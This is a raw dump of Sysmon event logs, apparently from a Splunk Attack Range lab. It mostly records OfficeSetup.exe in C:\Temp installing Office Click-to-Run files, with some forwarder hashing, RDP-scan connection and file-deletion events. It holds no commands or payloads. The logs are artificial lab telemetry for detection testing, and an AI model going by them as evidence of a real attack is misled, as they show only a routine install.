shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\ucrtbase.dll2021-04-20 14:53:38.566 23542300x800000000000000063277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:38.566{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9CEE0A3B8FAEDE0BB5684C03A026003,SHA256=AB639FC53988A72F9928A400A47CBEEC47D100FECD1EABF90B4253EF6EE32144,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.550{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\StreamServer.dll2021-04-20 14:53:38.550 11241100x800000000000000063275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.519{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\RepoMan.dll2021-04-20 14:53:38.519 11241100x800000000000000063274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.503{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\policy.dll2021-04-20 14:53:38.503 11241100x800000000000000063273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.503{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\offreg.dll2021-04-20 14:53:38.503 11241100x800000000000000063272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:38.472{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\officesvcmgr.exe2021-04-20 14:53:38.472 11241100x800000000000000063271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.457{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\officeinventory.dll2021-04-20 14:53:38.457 11241100x800000000000000063270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:38.394{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\OfficeClickToRun.exe2021-04-20 14:53:38.394 11241100x800000000000000063269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.378{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\OfficeC2RCom.dll2021-04-20 14:53:38.378 23542300x800000000000000049286Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:38.604{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2333FA80F6BA3FEAB6E1DAB4F3DFF9C0,SHA256=A0EF752AA5D9A741EAB19C8F6FD7787C31C94CB05FBBF1F0C621ABC8950FA1DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049285Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:35.925{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com53678-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049284Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:35.745{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52473-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000063268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:38.269{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\WIN-DC-339-20210420-1453.logMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:38.238{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\OfficeC2RClient.exe2021-04-20 14:53:38.238 11241100x800000000000000063266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.222{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\msvcr120.dll2021-04-20 14:53:38.222 11241100x800000000000000063265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.222{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\msvcp140.dll2021-04-20 14:53:38.222 11241100x800000000000000063264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.206{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\msvcp120.dll2021-04-20 14:53:38.206 11241100x800000000000000063263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.206{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\msix.dll2021-04-20 14:53:38.206 11241100x800000000000000063262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:38.206{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\MavInject32.exe2021-04-20 14:53:38.191 11241100x800000000000000063261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.191{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\manageability.dll2021-04-20 14:53:38.191 11241100x800000000000000063260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.144{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\inventory.dll2021-04-20 14:53:38.144 11241100x800000000000000063259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:38.113{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\IntegratedOffice.exe2021-04-20 14:53:38.113 11241100x800000000000000063258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:38.113{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\InspectorOfficeGadget.exe2021-04-20 14:53:38.113 11241100x800000000000000063257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.097{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\cpprestsdk.dll2021-04-20 14:53:38.097 11241100x800000000000000063256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.097{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\concrt140.dll2021-04-20 14:53:38.097 11241100x800000000000000063255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RUI.dll2021-04-20 14:53:38.066 11241100x800000000000000063254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.zh-tw.dll2021-04-20 14:53:38.066 11241100x800000000000000063253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.zh-cn.dll2021-04-20 14:53:38.066 11241100x800000000000000063252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.vi-vn.dll2021-04-20 14:53:38.066 11241100x800000000000000063251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.uk-ua.dll2021-04-20 14:53:38.066 11241100x800000000000000063250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.tr-tr.dll2021-04-20 14:53:38.066 11241100x800000000000000063249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.th-th.dll2021-04-20 14:53:38.066 11241100x800000000000000063248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.sv-se.dll2021-04-20 14:53:38.066 11241100x800000000000000063247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.sr-latn-rs.dll2021-04-20 14:53:38.066 11241100x800000000000000063246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.sl-si.dll2021-04-20 14:53:38.066 11241100x800000000000000063245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.sk-sk.dll2021-04-20 14:53:38.066 11241100x800000000000000063244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.ru-ru.dll2021-04-20 14:53:38.066 11241100x800000000000000063243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.ro-ro.dll2021-04-20 14:53:38.066 11241100x800000000000000063242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.pt-pt.dll2021-04-20 14:53:38.066 11241100x800000000000000063241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.066{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.pt-br.dll2021-04-20 14:53:38.050 11241100x800000000000000063240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.pl-pl.dll2021-04-20 14:53:38.050 11241100x800000000000000063239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.nl-nl.dll2021-04-20 14:53:38.050 11241100x800000000000000063238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.nb-no.dll2021-04-20 14:53:38.050 11241100x800000000000000063237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.ms-my.dll2021-04-20 14:53:38.050 11241100x800000000000000063236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.lv-lv.dll2021-04-20 14:53:38.050 11241100x800000000000000063235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.lt-lt.dll2021-04-20 14:53:38.050 11241100x800000000000000063234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.ko-kr.dll2021-04-20 14:53:38.050 11241100x800000000000000063233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.kk-kz.dll2021-04-20 14:53:38.050 11241100x800000000000000063232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.ja-jp.dll2021-04-20 14:53:38.050 11241100x800000000000000063231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.it-it.dll2021-04-20 14:53:38.050 11241100x800000000000000063230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.id-id.dll2021-04-20 14:53:38.050 11241100x800000000000000063229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.hu-hu.dll2021-04-20 14:53:38.050 11241100x800000000000000063228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.hr-hr.dll2021-04-20 14:53:38.050 11241100x800000000000000063227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.hi-in.dll2021-04-20 14:53:38.050 11241100x800000000000000063226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.he-il.dll2021-04-20 14:53:38.050 11241100x800000000000000063225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.fr-fr.dll2021-04-20 14:53:38.050 11241100x800000000000000063224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.fi-fi.dll2021-04-20 14:53:38.050 11241100x800000000000000063223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.et-ee.dll2021-04-20 14:53:38.050 11241100x800000000000000063222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.es-es.dll2021-04-20 14:53:38.035 11241100x800000000000000063221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.035{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.en-us.dll2021-04-20 14:53:38.035 11241100x800000000000000063220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.035{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.el-gr.dll2021-04-20 14:53:38.035 11241100x800000000000000063219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.035{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.de-de.dll2021-04-20 14:53:38.035 11241100x800000000000000063218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.035{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.da-dk.dll2021-04-20 14:53:38.035 11241100x800000000000000063217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.035{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.cs-cz.dll2021-04-20 14:53:38.035 11241100x800000000000000063216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.035{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.bg-bg.dll2021-04-20 14:53:38.035 11241100x800000000000000063215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.035{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2RINTL.ar-sa.dll2021-04-20 14:53:38.035 11241100x800000000000000063214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.019{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2R64.dll2021-04-20 14:53:38.019 11241100x800000000000000063213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.003{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\C2R32.dll2021-04-20 14:53:38.003 11241100x800000000000000063212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:38.003{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppVShNotify.exe2021-04-20 14:53:38.003 11241100x800000000000000063211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.003{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppVScripting.dll2021-04-20 14:53:38.003 11241100x800000000000000063210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.988{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppVPolicy.dll2021-04-20 14:53:37.988 23542300x800000000000000049291Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:39.807{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C5D2070FAB7DEB34D7FD5C275B7F5C5,SHA256=4B46887F523A80304DB61B7DFF2236A7669A7A2D7052E3674F8261BCCE273DF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.894{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Temp\OfficeC2R49DF76BF-A14D-44CB-9027-1A8929C06524\BIT629E.tmpMD5=B3272B2896BB5840F3C42189D8CE2575,SHA256=6B5C9DA2C3BE2B52DB31822E1467BD5A8317FF4C52C6DD97B0A79EE6BA7C0C84,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000063348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 